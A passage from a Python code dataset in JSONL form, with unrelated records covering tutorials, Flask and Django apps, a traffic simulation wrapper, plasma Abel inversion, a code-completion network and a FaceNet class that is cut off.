= [' '.join(x) for x in token]\n pickle.dump(trigram_mod, open(\"C:\\\\Users\\\\andre\\\\PycharmProjects\\\\prove\\\\Training Testing - Bucket - Classificazione Bayesiana\\\\news_category\\model.pickle\", 'wb'))\n return titles\n","sub_path":"text_cleaning.py","file_name":"text_cleaning.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"539115603","text":"\n#The range(5) provides an iteration of sequential numbers with range from 0 to 5.\nfor var in list(range(5)):\n print (var)\n\nfor letter in 'Python': # traversal of a string sequence\n print ('Current Letter :', letter)\nprint()\nfruits = ['banana', 'apple', 'mango']\nfor fruit in fruits: # traversal of List sequence\n print ('Current fruit :', fruit)\n\n #iterating using the sequence index\n fruits = ['banana', 'apple', 'mango']\nfor index in range(len(fruits)):\n print ('Current fruit :', fruits[index])\n\n #using else with for loop\n numbers=[11,33,55,39,55,75,37,21,23,41,13]\nfor num in numbers:\n if num%2==0:\n print ('the list contains an even number')\n break\nelse:\n print ('the list doesnot contain even number')\n\n\n #Nested for loop\n #the end='' is used to indicate that instead if a new line character after the print statement, use a space character\n for i in range(1,11):\n for j in range(1,11):\n k=i*j\n print (k, end=' ')\n print()","sub_path":"controlstatements/loops_for.py","file_name":"loops_for.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368084514","text":"import numpy as np\nimport plotly.graph_objs as go\n\n# Create random data with numpy\nN = 1000\nrandom_x = np.random.randn(N)\nrandom_y = np.random.randn(N)\n\n# Create a trace\ntrace = go.Scatter(\n x = random_x,\n y = random_y,\n mode = 'markers'\n)\ndata = [trace]\nfig = go.Figure(data=data)\nfig.write_html('scatter.html', auto_open=True)\n#fig.show()","sub_path":"week8/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"947968","text":"# 异常\n\n# 了解异常\n\n# 当检测到一个错误时,解释器就无法继续执行了,反而出现了一些错误的提示,这就是所谓的异常\n\n# 异常写法\n\n# 语法\n# try:\n# 可能发生错误的代码\n# except:\n# 如果出现异常执行此代码\n\n# 需求:尝试以只读模式打开文件,如果文件不存在,则以写的模式打开\ntry:\n f = open('Test.txt','r')\nexcept:\n f = open('Test.txt','w')\n\n# 了解异常类型\n\n# 异常类型NameError\n# print(name)\n\n#ZeroDivisionError\n# print(1/0)","sub_path":"Read-Search-Ask/Python/黑马2020/1-Python核心编程/2-面向对象编程/7-异常使用/1-了解异常.py","file_name":"1-了解异常.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"82193296","text":"from flask import Flask, render_template\nimport cbpy as cb\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n y = cb.gmatchlist()\n dlist = list();\n for x in y:\n if x not in dlist:\n dlist.append(x)\n\n return render_template('index.html', y=y, dlist=dlist)\n\n\n@app.route('/about', methods=['GET', 'POST'])\ndef bout():\n return render_template('about1.html')\n\n\n@app.route('/scores/', methods=['GET', 'POST'])\ndef scorecard(matid):\n x = cb.glivescore(matid + 1)\n if x[0] == \"Upcoming\":\n return render_template(\"error.html\", msg=x[0])\n elif len(x) == 1:\n return render_template(\"error.html\", msg=x[0])\n else:\n td = dict()\n td = x[8]\n bat = x[1]\n bow = x[3]\n batn = td[str(bat['id'])]\n bats = bat['score']\n bown = td[str(bow['id'])]\n bows = bow['score']\n batsman = x[5]\n bowler = x[6]\n\n return render_template('scores.html', x=x, teamdata=x[9], batn=batn, bown=bown, bats=bats, bows=bows,\n batsman=batsman, bowler=bowler)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"12115648","text":"books = {'Financial': 'Theodor Draiser', 'Rich dad, poor dad': 'Robert Kiyosaki', 'Think and get rich': 'Napoleon Hill'}\nreaders = {}\n\ndef get_info():\n print(f'На данный момент список читателей такой:\\n{readers}')\n print(f'Список книг такой:\\n{books}')\n\ndef give_book():\n book = input(f'Какую книгу вы хотите получить? Выберите из\\n {books}\\nВведите только название: ')\n reader = input('Введите имя: ')\n author = books.get(book)\n if book in books:\n if reader in readers:\n for k, v in readers.items():\n if k == reader:\n v.update({book: author})\n else:\n readers.update({reader: {book: author for k, v in books.items()}})\n books.pop(book)\n else:\n print('Эта книга недоступна')\n print('Ваша заявка успешно оформлена!')\n get_info()\n\ndef take_back_book():\n choice = input('Вы хотите взять книгу или вернуть? (1 или 2) ')\n if choice == '1':\n give_book()\n elif choice == '2':\n reader = input('Ваше имя: ')\n if reader in readers.keys():\n for v in readers.values():\n books.update(v.items())\n readers.pop(reader)\n get_info()\n take_back_book()\n \ndef manager():\n get_info()\n give_book()\n print('========================')\n take_back_book()\n print('========================')\n \n\nmanager()","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"355908676","text":"\"\"\"\n This module contains information related to a Simulation.\n It is capable of:\n\n - Loading the symuvia library \n - Loading the XML file \n - Launching a simulation for the corresponding XML file\n\"\"\"\n\nMAXSTEPS = 86400\n\nfrom datetime import datetime\nfrom lxml import etree\nfrom ctypes import cdll, create_string_buffer, c_int, byref, c_bool, c_double \n\nfrom ..func.container import Container\n\nclass Simulator():\n \"\"\"\n Simulator class can launch a simulation. \n \"\"\"\n def __init__(self, fullSymPath):\n \"\"\"\n Class constructor\n :param string fullSymPath: string containing the library path to Simuvia \n \"\"\"\n self.sfullSymPath = fullSymPath\n self.olibSymuVia = self.load_SymuViaLib()\n self.iBufferString = 10000\n\n def load_SymuViaLib(self):\n \"\"\"\n Library loader \n \"\"\"\n try:\n oSimulator = cdll.LoadLibrary(self.sfullSymPath)\n except:\n print('Symuvia Library could not be loaded')\n \n return oSimulator\n\nclass Simulation(Simulator):\n \"\"\"\n Simulation parses an XML data for a paricular case. When created a simulator is asociated\n \"\"\"\n\n def __init__(self, fileName, fullSymPath):\n \"\"\"\n Class constructor\n \n :param string fileName: string containing the library path to a Simulation \n\n :param string fullSymPath: string containing the library path to Simuvia \n \"\"\"\n\n super().__init__(fullSymPath)\n print(f'Simulator created at: {fileName}')\n self.sfileName = fileName\n self.oSimulation = self.load_Simulation()\n\n def load_Simulation(self):\n \"\"\" Load XML Simulation file in order to perform simulation \"\"\"\n try: \n oSimulator = self.olibSymuVia\n oSimulation = oSimulator.SymLoadNetworkEx(self.encoded_FileName())\n print('Symuvia Library succesfully loaded') \n except:\n print('Symuvia Library could not be loaded')\n return oSimulation\n\n def encoded_FileName(self):\n \"\"\" Returns the file name encoded for the simulator \"\"\"\n return self.sfileName.encode('UTF8')\n \n def run_Simulation(self):\n \"\"\" Launches a full-time simulation \"\"\" \n return self.olibSymuVia.SymRunEx(self.encoded_FileName())\n\n def init_Simulation(self):\n \"\"\" Initializes conditions for a step by step simulation\"\"\"\n # Pointers\n self.sRequest = create_string_buffer(self.iBufferString)\n self.bEnd = c_int()\n self.bSecond = c_bool(True)\n self.bForce = c_int(1)\n self.bSuccess = 1\n self.oContainer = Container()\n\n def set_NumberIterations(self, numIt = MAXSTEPS):\n \"\"\" Find the number of iterations within for a Simulation\n\n :param int numIt: Integer indicating the maximum number of iterations\n \"\"\"\n self.load_XML()\n sPathTime = 'SIMULATIONS/SIMULATION'\n oElement = self.oXMLTree.xpath(sPathTime)[0].attrib\n sTimeStep = oElement['pasdetemps']\n sTimeStart = oElement['debut']\n sTimeEnd = oElement['fin']\n sDate = oElement['date']\n sDateSt = sDate + ' ' + sTimeStart\n sDateEd = sDate + ' ' + sTimeEnd\n sDateFormat = '%Y-%m-%d %H:%M:%S'\n oTimeSt = datetime.strptime(sDateSt, sDateFormat)\n oTimeEd = datetime.strptime(sDateEd, sDateFormat)\n fDeltaT = oTimeEd - oTimeSt\n fDeltaT = fDeltaT.total_seconds()\n nIterations = int(fDeltaT/float(sTimeStep))\n return min(nIterations, numIt)\n\n def load_XML(self):\n \"\"\" Creates XML object within Python\"\"\"\n oTree = etree.parse(self.sfileName)\n root = oTree.getroot()\n self.oXMLTree = root\n\n def run_SimulationByStep(self, numIt = MAXSTEPS):\n \"\"\" Run a full simulation step by step\"\"\"\n self.load_Simulation()\n self.init_Simulation()\n\n iIterations = self.set_NumberIterations(numIt)\n step = iter(range(iIterations)) \n while self.bSuccess>0:\n try:\n iIt = next(step)\n print(f'Iteration: {iIt+1}')\n self.run_Step() \n self.oContainer.fill_Container(self.query_DataStep()) \n except StopIteration:\n print('Stop by iteration') \n self.bSuccess = 0\n except: \n self.bSuccess = self.run_Step()\n sRequest = self.query_DataStep()\n print('Return from Symuvia Empty: {}'.format(sRequest))\n self.bSuccess = 0\n\n def run_Step(self):\n \"\"\" Launches a single step fo simulation \"\"\"\n self.bSuccess = self.olibSymuVia.SymRunNextStepEx(self.sRequest, True, byref(self.bEnd))\n\n def query_DataStep(self):\n \"\"\" Query data from a step\"\"\"\n return self.sRequest.value.decode('UTF8')","sub_path":"symupy/func/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"55646729","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom App import views\n\nurlpatterns = [\n path('', views.App, name='App'),\n path('join', views.join, name='join'),\n path('sdg', views.sdg, name='sdg'),\n path('lda', views.lda, name='lda'),\n path('module/', views.module, name='module'),\n path('publication/', views.publication, name='publication'),\n path('exportMod', views.export_modules_csv, name='export_modules_csv'),\n path('exportPub', views.export_publications_csv,name='export_publications_csv'),\n]\n","sub_path":"App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"383422418","text":"# coding: utf-8\n\nimport github.GithubObject\n\n\"\"\"\nDeal with \"named\" milestone. GitHub use number to reference milestone.\nHowever GitHub ensure that the unicity of the title attribute in the\nrespository. Here the title is taken as the identifier. This does not\nallows renaming but it should be ok for most uses.\n\nWARNING:\n\n* It seems that there is a bug in the repo.create_milestone method.\n It does not work with the deadline parameter. The code below solve\n this problem.\n\n* The date due_on returns something with hours although hours cannot be\n set in the interface. It does not take into account hours in parameters.\n One should use due_on.date() if comparison is required.\n\n\"\"\"\n\n\ndef getMilestone(repo, title):\n \"\"\"\n Return the milestone with the given title or None if there is no such milestone in the repository\n :param repo: repository\n :param title: title of the milestone to search\n :return str: the milestone object or None\n \"\"\"\n milestones = repo.get_milestones()\n for m in milestones:\n if m.title==title :\n return m\n return None\n\ndef ensureMilestone(repo,\n title,\n description=github.GithubObject.NotSet,\n state=github.GithubObject.NotSet,\n # 'open' | closed\n dueOn=github.GithubObject.NotSet,\n prefix=''):\n m = getMilestone(repo, title)\n if m == None:\n print(prefix+'Creating milestone \"%s\"... ' % title),\n m = repo.create_milestone(title)\n # For some strange reason the method create_milestone\n # dos not work with the parameter due_on.\n # So after creating the milestone the code below\n # set additional parameters and in particular the due_on\n m.edit(title, state, description, dueOn)\n print(prefix+' milestone #%i created' % m.number)\n else:\n print(prefix+'Editing milestone \"%s\" ... ' % title),\n m.edit(title, state, description, dueOn)\n print(prefix+' milestone #%i edited' % m.number)\n return m\n","sub_path":"githubbot/milestones.py","file_name":"milestones.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"422049473","text":"import os\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nload_dotenv()\n\nclass MrMeeseek(commands.Bot):\n def __init__(self):\n super().__init__(command_prefix=\"/\")\n\n async def on_ready(self):\n print(f\"We have logged in as {self.user.display_name}\")\n\nmrmeeseek = MrMeeseek()\nmrmeeseek.run(os.getenv(\"TOKEN\"))\n","sub_path":"MrMeeseek.py","file_name":"MrMeeseek.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"399909299","text":"import os\nfrom datetime import date, timedelta\nfrom random import randint\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"flowlityTest.settings\")\ndjango.setup()\n\n\nITEMS = ['Table', 'Chair', 'Plate', 'Knife']\n\n\ndef generate_items():\n from inventory.models import Inventory\n items_to_create = []\n # find alternative to this thanks to itertool\n for i, item in enumerate(ITEMS):\n for j in range(60):\n item_to_create = {}\n item_to_create['product_name'] = item\n item_to_create['product_id'] = i\n item_to_create['date'] = date.today() + timedelta(days=-j)\n item_to_create['inventory_level'] = randint(0, 30)\n items_to_create.append(Inventory(**item_to_create))\n print(len(items_to_create))\n Inventory.objects.bulk_create(items_to_create)\n\n\ndef main():\n generate_items()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"inventory_data.py","file_name":"inventory_data.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"319883924","text":"# coding=utf-8\nfrom lib.config.Config import Config\n\nclass STLConfig(Config):\n def __init__(self):\n super(STLConfig, self).__init__()\n self.NUM_OUTPUTS = 10\n self.GPU_NUM = 1\n self.BATCH_SIZE = 100\n self.IMAGE_SIZE = 96\n self.DATA_PATH = \"../data/STL/\"\n self.GAN_DATA_PATH = \"../ganData/STL/train/\"\n self.NUM_WORKERS_LOAD_IMAGE = 4\n self.IMAGE_CHANNEL = 3\n self.BATCH_SIZE = 50\n self.EPOCH_NUM = 1000\n self.LR_GENERATOR = 2e-4\n self.LR_DISCRIMINATOR = 2e-4\n self.BETA1 = 0.5\n self.GPU_NUM = 2\n self.NOISE_Z = 100\n\n self.GENERATOR_FEATURES_NUM = 64\n self.DISCRIMINATOR_FEATURES_NUM = 64\n self.D_EVERY = 1 # 每1个batch训练一次判别器\n self.G_EVERY = 5 # 每5个batch训练一次生成器\n self.DECAY_EVERY = 10 # 没10个epoch保存一次模型\n self.SAVE_PATH = \"output/\"\n\n self.LABELS = [\"airplane\",\n \"bird\",\n \"car\",\n \"cat\",\n \"deer\",\n \"dog\",\n \"horse\",\n \"monkey\",\n \"ship\",\n \"truck\"]","sub_path":"lib/config/STLConfig.py","file_name":"STLConfig.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"527508471","text":"import numpy as np\nimport math\n\n\ndef get_peak_to_valley(file):\n temp_data = np.genfromtxt(file, skip_header=3)\n peak_to_valley = temp_data[0]\n return peak_to_valley\n\n\ndef image_to_double(im):\n info = np.iinfo(im.dtype)\n return im.astype(np.float)/info.max\n\n\ndef apply_threshold(image, t):\n \"\"\"\n image: image represented as a 2D array\n T: number between 0 and 1\n \"\"\"\n image_max = np.amax(image)\n image_min = np.amin(image)\n diff = image_max-image_min\n threshold = image_min+diff*t\n thresholded_image = np.copy(image)\n thresholded_image[thresholded_image < threshold] = 0\n return thresholded_image\n\n\ndef symmetrize_image(image, i):\n \"\"\"\n image: image represented as a 2D array\n i: index of center of mass\n returns one half of the symmetrized image\n \"\"\"\n n_pixels, _ = np.shape(image)\n symmetrized_half = image[i, :]\n j = 1\n while j <= i and i+j < n_pixels:\n temp = np.stack((image[i-j, :], image[i+j, :]))\n average = np.mean(temp, axis=0)\n symmetrized_half = np.vstack((symmetrized_half, average))\n j += 1\n return symmetrized_half\n\n\ndef get_index_of_center_of_mass_by_line(image_column):\n \"\"\"\n image_column: a column of an image represented as a 1D array\n returns the index of the center of mass\n \"\"\"\n f = image_column\n x = np.arange(1, len(f) + 1)\n first_moment = calculate_moment(f, x, 1, 0)\n total_mass = calculate_moment(f, x, 0, 0)\n # The first moment divided by the total mass is the center of mass, i.e. a point in the interval x.\n # Since x = [1, len(f)], the index of the center of mass should be calculated as below.\n center_of_mass = first_moment/total_mass\n index_of_center_of_mass = np.rint(center_of_mass-1)\n return int(index_of_center_of_mass)\n\n\ndef get_index_of_center_of_mass(thresholded_image):\n \"\"\"\n thresholded_image: an image where a threshold has been applied\n returns the row index that corresponds to the center of mass of the thresholded image\n \"\"\"\n return get_index_of_center_of_mass_by_line(np.sum(thresholded_image, axis=1))\n\n\ndef calculate_moment(f, x, n, c):\n \"\"\"\n f: function f(x) represented as an 1D array\n n: order of moment\n c: center value (0)\n returns the moment calculated with the formula on https://en.wikipedia.org/wiki/Moment_(mathematics)\n \"\"\"\n integrand = np.multiply(np.power(x-c, n), f)\n return np.trapz(integrand)\n\n\ndef rebuild_image(symmetrized_half):\n n_rows, n_columns = np.shape(symmetrized_half)\n full_image = np.zeros((2*n_rows-1, n_columns))\n full_image[0:n_rows, :] = symmetrized_half\n full_image[n_rows:, :] = np.flipud(symmetrized_half[0:-1, :])\n return full_image\n\n\ndef abel_inversion(phase_map, thresholded_phase_map, y_calibration, wavelength):\n index_of_center_of_mass = get_index_of_center_of_mass(thresholded_phase_map)\n symmetrized_half_phase_map = symmetrize_image(phase_map, index_of_center_of_mass)\n n_rows, n_columns = np.shape(symmetrized_half_phase_map)\n abel_inverted_half_map = np.zeros((n_rows, n_columns))\n i = 0\n for column in symmetrized_half_phase_map.T:\n abel_inverted_half_map[:, i] = abel_inversion_by_line(column, y_calibration)\n i += 1\n half_density_map = get_density_map(np.flipud(abel_inverted_half_map), wavelength)\n return half_density_map, rebuild_image(half_density_map)\n\n\ndef get_density_map(m, wavelength):\n c = 0.299792458 # [µm/fs]\n pulsation = wavelength_to_pulsation(wavelength)\n m = m*(c/pulsation)\n m = 1+m\n m = np.power(m, 2)\n m = 1-m\n density_map = m*pulsation_to_critical_density(pulsation)\n return density_map\n\n\ndef wavelength_to_pulsation(wavelength):\n \"\"\"\n wavelength: wavelength in nanometer\n \"\"\"\n c = 299.792458 # [nm/s]\n pulsation = 2*math.pi*c/wavelength # [rad/fs]\n return pulsation\n\n\ndef pulsation_to_critical_density(pulsation):\n c = 299792458 # [m/s]\n epsilon_0 = 1/(math.pow(c, 2)*4*math.pi*1e-7) # [C^2N^-1m^-2]\n m_e = 9.10938215e-31 # [kg]\n e = 1.602176487e-19 # [C]\n temp = (epsilon_0*m_e)/math.pow(e, 2)*1e24*1e-18\n return math.pow(pulsation, 2)*temp\n\n\ndef abel_inversion_by_line(phase_half_map_column, dy):\n phase_array = np.asarray(phase_half_map_column)\n n_pixels = phase_array.size\n y = np.linspace(0, (n_pixels-1)*dy, n_pixels)\n s = derivative(phase_array, 0, 0, dy)\n inverted_column = []\n i = 0\n for r in y:\n sub_y = y[i:]\n sub_s = s[i:]\n temp = np.power(sub_y, 2)-math.pow(r, 2)\n temp = np.sqrt(temp)\n temp = np.reciprocal(temp, out=np.zeros_like(temp), where=temp != 0)\n integrand = np.multiply(sub_s, temp)\n integral = np.trapz(integrand, dx=dy)\n inverted_column.append(-integral/math.pi)\n i += 1\n return inverted_column\n\n\ndef integrate(f, dt):\n n = f.size\n integral = 0\n for i in range(0, n):\n if i == 0 or i == n-1:\n integral += f[i]\n else:\n integral += 2*f[i]\n return integral*dt/2\n\n\ndef derivative(x, ic, fc, dt):\n n = x.size\n y = []\n for i in range(n):\n if i == 0:\n d = (x[i+1]-ic)/(2*dt)\n elif i == n-1:\n d = (fc-x[i-1])/(2*dt)\n else:\n d = (x[i+1]-x[i-1])/(2*dt)\n y.append(d)\n return y\n","sub_path":"plasma_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"262991212","text":"import pandas as pd\nimport numpy as np\nfrom random import seed\nfrom random import random\n\n# Creates a dataframe which will be exported to an Excel spreadsheet.\ndataframe = pd.DataFrame(\n columns=['RFID_Nummer', 'Ammoniak', 'Fijnstof', 'CO2', 'Temperatuur'])\n\n# Generates random values between 7 and 21 for the column 'Ammoniak' with 500 rows.\ndataframe['Ammoniak'] = np.random.randint(7, 21, 500)\n\n# Generates random values between 25 and 30 for the column 'Fijnstof' with 500 rows.\ndataframe['Fijnstof'] = np.random.randint(25, 30, 500)\n\n# Generates random values between 0 and 20 for the column 'CO2' with 500 rows.\ndataframe['CO2'] = np.random.randint(0, 20, 500)\n\n# Generates random values between 16 and 18 for the column 'Temperatuur' with 500 rows.\ndataframe['Temperatuur'] = np.random.randint(16, 18, 500)\n\n# Creates RFID numbers used to identify the sensors which the FEEDR bot uses to navigate the barn.\ndataframe['RFID_Nummer'] = dataframe.index + 1\n\n# Saves the dataframe with generated values to an Excel spreadsheet.\nexport_excel = dataframe.to_excel(\n r'/Users/thymen/sieplo-team3/demo_data.xlsx', index=None, header=True)\n\n# Iterates over the values in column 'Ammoniak' to check if the levels are too high or critically high.\n# This can also be done with other columns\nfor index, row in dataframe.iterrows():\n if row['Ammoniak'] > 19:\n print(\"Ammoniak waarde in RFID\", row['RFID_Nummer'], \"is Kritiek\")\n elif row['Ammoniak'] > 15:\n print(\"Ammoniak waarde in RFID\", row['RFID_Nummer'], \"is te hoog\")\n","sub_path":"Python data genaratie/data_generatie.py","file_name":"data_generatie.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567259400","text":"from pydoc import pager\r\nfrom flask import Blueprint, jsonify, request\r\nfrom app.repository.data_dict_repository import DataDictRepository\r\n\r\nrepo = DataDictRepository()\r\n\r\nblueprint = Blueprint('dict', __name__)\r\n\r\n@blueprint.route('/dict', methods=['GET'])\r\ndef dict_list():\r\n args = request.args\r\n q = None\r\n size = 200\r\n page = 0\r\n if 'q' in args:\r\n q = args['q']\r\n if 'size' in args:\r\n size = int(args['size'])\r\n if 'page' in args:\r\n page = int(args['page']) - 1 \r\n if page < 0:\r\n page = 0\r\n\r\n dictList = repo.list(page, size, q)\r\n return jsonify({ \"total\": dictList[1], \"data\": [d.__json__() for d in dictList[0]] })\r\n \r\n@blueprint.route('/dict//', methods=['GET'])\r\ndef dict_get_by_table(system, table):\r\n list = repo.get_by_table(system, table)\r\n return jsonify([d.__json__() for d in list])","sub_path":"app/api/db_dict.py","file_name":"db_dict.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"502511899","text":"class Solution:\n def nextGreaterElement(self, n):\n num = [c for c in str(n)]\n i = len(num) - 1\n while i > 0 and num[i - 1] >= num[i]:\n i -= 1\n if i == 0:\n return -1\n j = i\n while j + 1 < len(num) and num[j + 1] > num[i - 1]:\n j += 1\n num[j], num[i - 1] = num[i - 1], num[j]\n result = int(\"\".join(num[:i] + sorted(num[i:])))\n return -1 if result >= 2 ** 31 else result\n","sub_path":"python/2020/dec/next-greater-element-iii.py","file_name":"next-greater-element-iii.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"118346531","text":"import tflearn\nimport numpy as np\n\n# determines how many tokens before and after are to be used during training\ncontext_length = 5\nprocessed_training_data_dir = \"./../training_data/processed_training_data/\"\n\nclass code_completion_context:\n\n # covnerts a token, that is a dict into a string\n def token_to_string(self, token):\n return token[\"type\"] + \"-@@-\" + token[\"value\"]\n \n # converts a strin, that represents a token into a dict\n def string_to_token(self, string):\n splitted = string.split(\"-@@-\")\n return {\"type\": splitted[0], \"value\": splitted[1]}\n \n # maps a string (token) to a unique ID, that corresponds to where the token appeared in the code\n def one_hot(self, string):\n vector = [0] * len(self.string_to_number)\n vector[self.string_to_number[string]] = 1\n return vector\n \n \"\"\"\n gets a set of tokens_lists. Each list represents a program with tokens in the correct order. CHANGE REPRESENTATION HERE\n Initializes dicts, that map unique numbers to each KIND of token. I.e.: 50 different kinds of tokens -> each has unique number\n Those are used to utilize one hot encoding with appropriate length.\n X Y pairs are created, consisting of one hot encoded vectors.\n :return: (x_list, y_list)\n \"\"\"\n def prepare_data(self, token_lists):\n # encode tokens into one-hot vectors\n all_token_strings = set()\n for token_list in token_lists:\n for token in token_list:\n all_token_strings.add(self.token_to_string(token))\n all_token_strings.add(\"padding-@@-padding\") # add a padding token for corners\n all_token_strings = list(all_token_strings)\n all_token_strings.sort()\n print(\"Unique tokens: \" + str(len(all_token_strings)))\n self.string_to_number = dict()\n self.number_to_string = dict() \n max_number = 0\n for token_string in all_token_strings:\n self.string_to_number[token_string] = max_number\n self.number_to_string[max_number] = token_string\n max_number += 1\n \n # prepare x,y pairs\n xs = []\n ys = []\n\n # for efficiency reasons: load data that already is in the right format instead of processing it every time\n if os.path.isfile(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\"):\n print(\"loading training data from .npy files...\")\n xs_dict = numpy.load(processed_training_data_dir + \"data_xs_context_\" + str(context_length) + \".npz\")\n ys_dict = numpy.load(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\")\n xs = xs_dict[xs_dict.keys()[0]].tolist()\n ys = ys_dict[ys_dict.keys()[0]].tolist()\n print(\"load done\")\n else:\n for token_list in token_lists:\n for idx, token in enumerate(token_list):\n token_string = self.token_to_string(token)\n\n # get prefix and suffix\n prefix = token_list[:idx]\n if idx+1 < len(token_list):\n suffix = token_list[idx+1:]\n else:\n suffix = []\n\n # get one_hot_encodings\n prefix, suffix = self.trim_to_length(prefix, suffix, context_length)\n\n # create data for NN\n xs.append(self.one_hot_tokenlist(prefix) + self.one_hot_tokenlist(suffix))\n ys.append(self.one_hot(token_string))\n\n # save data for later retraining\n print(\"saving training data to .npy files...\")\n numpy.savez_compressed(processed_training_data_dir + \"data_xs_context_\" + str(context_length) + \".npz\", numpy.array(xs))\n numpy.savez_compressed(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\", numpy.array(ys))\n print(\"save done\")\n\n return (xs, ys)\n\n # creates the neural network\n def create_network(self):\n # define input_data layer: shape tells us how the input data looks like. First element defines batch size and should be \"None\"\n self.net = tflearn.input_data(shape=[None, 2*context_length*len(self.string_to_number)]) # 2*context_length\n # add a deep layer with 32 nodes (and linear activation function?)\n self.net = tflearn.fully_connected(self.net, 32)\n # add a deep layer with softmax activation and as many nodes as one hot encoding length\n self.net = tflearn.fully_connected(self.net, 32)\n # add a deep layer with softmax activation and as many nodes as one hot encoding length\n self.net = tflearn.fully_connected(self.net, len(self.string_to_number), activation='softmax')\n # output with a regression layer\n self.net = tflearn.regression(self.net)\n self.model = tflearn.DNN(self.net)\n \n def load(self, token_lists, model_file):\n self.prepare_data(token_lists)\n self.create_network()\n self.model.load(model_file)\n \n def train(self, token_lists, model_file):\n (xs, ys) = self.prepare_data(token_lists)\n self.create_network()\n print(\"network created\")\n self.model.fit(xs, ys, n_epoch=5, batch_size=128, show_metric=True)\n print(\"model trained\")\n self.model.save(model_file)\n \n # gets a hole in the code, a.k.a prefix and suffix and predicts what has to be in the hole\n def query(self, prefix, suffix):\n # get prefix and suffix of desired length\n prefix, suffix = self.trim_to_length(prefix, suffix, context_length)\n # encode prefix and suffix and concatenate them for NN input\n x = self.one_hot_tokenlist(prefix) + self.one_hot_tokenlist(suffix)\n y = self.model.predict([x])\n predicted_seq = y[0]\n #print(\"PREDICTION:\")\n #print(y)\n #print(\"=================\")\n #print(predicted_seq)\n if type(predicted_seq) is numpy.ndarray:\n predicted_seq = predicted_seq.tolist() \n best_number = predicted_seq.index(max(predicted_seq))\n best_string = self.number_to_string[best_number]\n best_token = self.string_to_token(best_string)\n # return prediction as a list, containing the predicted token as a dict\n return [best_token]\n \n def trim_to_length(self, prefix:list, suffix:list, final_length:int):\n \"\"\"\n receives a list of prefix and suffix tokens and trims them to the desired length, adding padding if necessary\n \"\"\"\n\n if len(prefix) < final_length:\n #print(\"prefxix <\")\n needed_padding = final_length - len(prefix)\n prefix = [{\"type\": \"padding\", \"value\": \"padding\"}] * needed_padding + prefix\n elif len(prefix) > final_length:\n #print(\"prefix >\")\n prefix = prefix[-final_length:]\n\n if len(suffix) < final_length:\n #print(\"suffix <\")\n needed_padding = final_length - len(suffix)\n suffix = suffix + [{\"type\": \"padding\", \"value\": \"padding\"}] * needed_padding\n elif len(suffix) > final_length:\n #print(\"suffix >\")\n suffix = suffix[:final_length]\n #print(\"return from trim with prefix=\")\n #print(prefix)\n #print(\"suffix=\")\n #print(suffix)\n\n return (prefix, suffix)\n\n def one_hot_tokenlist(self, tokenlist):\n \"\"\"\n takes a list of tokens, that are encoded as dicts and returns a list of concatenated one_hot_encodings of all tokens\n \"\"\"\n one_hot_encodings = []\n for token in tokenlist:\n one_hot_encodings = one_hot_encodings + self.one_hot(self.token_to_string(token))\n\n return one_hot_encodings","sub_path":"src/code_completion_context.py","file_name":"code_completion_context.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"171344492","text":"import tensorflow as tf\nfrom .facenet import facenet\nimport cv2 as cv\n\n\nclass FacenetEmbedding:\n def __init__(self, model_dir_path):\n self.img_size = (160, 160)\n with tf.Graph().as_default():\n self.sess = tf.InteractiveSession()\n facenet.load_model(model_dir_path)\n self.images_placeholder = tf.get_default_graph().get_tensor_by_name('input:0')\n self.images_placeholder = tf.image.resize_images(self.images_placeholder, self.img_size)\n self.embeddings_placeholder = 